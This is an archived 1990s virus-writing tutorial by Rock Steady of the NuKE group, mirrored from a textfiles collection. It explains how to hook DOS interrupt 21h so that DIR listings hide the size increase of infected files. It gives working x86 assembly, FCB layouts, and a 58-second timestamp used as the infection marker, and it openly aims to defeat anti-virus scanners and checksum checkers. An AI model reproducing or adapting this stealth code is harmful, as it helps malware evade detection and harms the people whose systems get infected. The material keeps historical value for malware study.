💾 Archived View for spam.works › mirrors › textfiles › virus › rstut007.txt captured on 2023-06-16 at 21:04:27.

View Raw

More Information

-=-=-=-=-=-=-

                          
                     *****************************    
                     **   Directory Stealth     **                              
                     **                         **                              
                     **   By Rock Steady/NuKE   ** 
                     *****************************

  Stealth Viruses are the Viruses that I must admit Anti-Viral Queers      
  Don't tend to like at all. Emagine if we added a Polymorphic feature into
  the Stealth Virus? But, if you want to Continue Writing Viruses you have 
  to make them Stealth. MS-DOS Version 6.0 Now comes with Virus Scanners   
  and CRC & Checksum Checkers. In order to stop many viruses, But it will  
  NEVER stop the `Stealth' Virus that is SMART of those AV features!       
                                                                           
  People think that there is ALOT of more INFECTED PCs since the virus     
  threat, started in 1986-7. Even though in the beginning only 10 or so    
  viruses were known, they Infected more systems, Compared to the viruses  
  today, where we have about 1300 and growing. But the truth is LESS PCs   
  are getting infect now, as people are now Virus Aware. With all the      
  utilities out, any joker can stop and clean a virus in seconds. Come     
  on, how many people MEMORIZED COMMAND.COM size? Out of my head its       
  47845 (MS-Dos V5.0). A simple increase of size tells me I got a problem. 
                                                                           
  A simple Stealth Feature every virus MUST have is the DOS `Dir' Stealth  
  feature. That will NOT show you the INCREASE of file size, when the      
  virus infects it. I have played with a few routines as such. I have      
  tried reducing the File size in the FAT area, which results in the       
  famous CHKDSK error reports of Loss Sectors, or Cross Links... And       
  fixing them with CHKDSK will result in damaging the file for good.       
                                                                           
  What can we do? How about reducing the File size Right AFTER its read    
  by DOS or any Utilities and right BEFORE its display on the screen!      
  Yeah that's an Idea, Here's how to go about it...                        
                                                                           
  %Theory%                                                                 
  ~~~~~~~~                                                                 
  First we must HOOK Int 21h, as every time a `DIR' is done, Int 21h       
  function 11h & 12h is called! If you don't know how to Hook Interrupts   
  Read RESIDENT VIRIIs Article in this NewsLetter.                         
                                                                           
   Int21_Handler:                                                          
          cmp     ah,11h                  ;Is a DOS `Dir' being done?      
          je      dir_stealth             ;Yes, Jump to `DIR_STEALTH'      
          cmp     ah,12h                  ;Is a DOR `Dir' Being done?      
          je      dir_stealth             ;Yes, Jump to `DIR_STEALTH'      
                                                                           
  Int21Call:                                                               
          jmp     dword ptr cs:[Int21]    ;Or Else Goto ORIGINAL Int 21h   
          ret                             ;Is need for the CALL of below   
                                                                           
  That's all that is needed in your Int21_Handler. Ofcourse if you are     
  infecting file that are being Execute you add it ABOVE! Anyhow lets      
  Explain the `DIR_STEALTH'                                                
                                                                           
  Offset  Size   Description                                               
    ??????????????????[Normal FCB]??????????????????????????????????       
    00h ?  1  ?  Drive Number 00=current drive 01=A,02=B,03=C etc..        
    01h ?  8  ?  Filename. Unused Spaces padded with Blanks                
    09h ?  3  ?  Extension of Filename.                                    
    0Ch ?  2  ?  Current block. points to block of records                 
    0Eh ?  2  ?  Record Size.                                              
    10h ?  4  ?  FileSize in Bytes. (Low-order first, then high-order)     
    14h ?  2  ?  Date of Last Write. YY-MM-DD into bits YYYY-YYYM-MMMD-DDDD
    16h ?  2  ?  Time of Last Write. HH:MM:SS into bits HHHH-HMMM-MMMS-SSSS
    18h ?  4  ?  Reserved                                                  
   *1Ch ?  4  ?  SAME `10h' but THIS FILESIZE gets printed on Screen!      
    20h ?  1  ?  Offset of current record                                  
    21h ?  4  ?  Relative Record                                           
                                                                           
  * = Field Changed by virus.                                              
                                                                           
  Extended FCB: Are Identical to the Normal FCB but, it has three new      
  ~~~~~~~~~~~~  fields totalling 7 bytes. (That is why we add y to BX)     
                The additional 7 bytes are added to the BEGINNING!         
                                                                           
                                                                           
  Offset  Size   Description                                               
    ??????????????????[Extended FCB]????????????????????????????????       
   -07h ?  1  ?  ALWAYS FFh tells use this is an Extended FCB              
   -06h ?  5  ?  Reserved for DOS                                          
   -01h ?  1  ?  Attribute Byte                                            
                                                                           
  So if we have an Extended FCB the first Byte will be FFh simply INC it   
  and if its ZERO you got a Extended FCB! You can also CMP ES:[BX],FFh     
  but that takes too many Bytes! Be COMPACT!!!                             
                                                                           
 %Algorithms%                                                              
 ~~~~~~~~~~~~                                                              
 CONDISTION: After calling Function 11h/12h (Int 21h) it will              
       search with the contents in the FCB. (*.*) which the DS:DX          
       registers point to the FCB. If successful it will DUPLICATE         
       the specified of the FCB in the current DTA (Disk Transfer Area)    
       And basically we will EDIT the info in the DTA!                     
 NOTE: Just because we are using the DTA doesn't mean this will work for   
       function 4Eh/4Fh (Int 21h) that uses the DTA and ASCIIZ strings to  
       search, that is a different procedure, though somewhat the same as  
       this one. See Method #2, for that.                                  
                                                                           
   Step 1. We call the Int 21h so we may have the results to play with     
           BEFORE DOS displays them on screen.                             
   Step 2. Get the Current PSP, As the FCB is located inside the PSP       
           in COM files its CS:0000 - CS:00FF. But in EXEs it can be any-  
           where, Int21h/AH=51 (Undocemented) will do this for us.         
   Step 3. Unmask the seconds (see if its infected) Quit if NOT            
   Step 4. Get the current DTA                                             
   Step 5. Test if it is Either an Extended FCB or Normal! If Extended     
           Simple add 7h to the Address. (As Extended only have 7 bytes    
           extra in the begining)                                          
   Step 6. Minus File size from the DTA! & Restore Time Back               
                                                                           
 ; Here it is... Method #1                                                 
                                                                           
   dir_stealth:                                                            
          pushf                   ;Fake an INT Call                        
          push    cs              ;Needed to return back HERE! (Virus)     
          call    Int21Call       ;Call the interrupt (See `Int21_Handler')
          test    al,al           ;AL=00h if successful                    
          jnz     no_good         ;Not Successful. Errors Eg:No More Files 
                                                                           
          push    ax                                                       
          push    bx      ;Save them since they will be used! So when      
          push    es      ;We exit all is restored to as Before!           
          mov     ah,51h  ;(Undocmented) Gets the Current PSP and puts     
          int     21h     ;it into BX                                      
                                                                           
          mov     es,bx         ;ES now has PSP segment Address            
          cmp     bx,es:[16h]   ;Did we open a Good PSP?                   
          jnz     exit_man      ;No, PSP unavailable, Exit Dude            
          mov     bx,dx         ;BX now points to the Original FCB in PSP  
          mov     al,[bx]       ;AL now has the current drive              
          push    ax            ;Save it to tell if its an Extended FCB    
          mov     ah,2fh        ;Get DTA (Disk Transfer Address)           
          int     21h                                                      
  ;Also before we start fiddling around we must know if we are working with
  ;And EXTENDED FCB or the Normal FCB, or else Major Problems! The Extended
  ;Has three fields appended to the normal one... (Above)                  
                                                                           
          pop     ax            ; AL = FFh if Extended FCB or else Drive # 
          inc     al            ; Will tell us if we have an Extended FCB  
          jnz     fcb_ok        ; No, We don't continue as normal          
          add     bx,7h         ; Yes, we do, add 7h to BX pointer         
  fcb_ok: mov     ax,es:[bx+17h]  ;Gets Seconds Field                      
          and     ax,1fh          ;Unmask to have SECONDS only             
          xor     al,1dh          ;is it 58 seconds? (1d * 2)              
          jnz     not_infected    ;Nope, okay its not infected             
          and     byte ptr es:[bx+17h],0e0h   ;Restores seconds            
          sub     es:[bx+1dh],virus_size      ;Subtract FileSize with Virii
          sbb     es:[bx+1fh],ax              ;Needed to fix up Bytes with 
  not_infected:                               ;Borrowing                   
          pop     es              ;Ciao, Ciao                              
          pop     bx                                                       
          pop     ax                                                       
  no_good:iret             ;Pretend you came back from an Interrupt call!  
  ;----------------------------The EnD-------------------------------------
                          Rock Steady / NuKE                               
                 `Feed my Frankenstein', Alice Cooper                      
  NOTE: This Code Works, Look at NuKE PoX V1.1 to see it...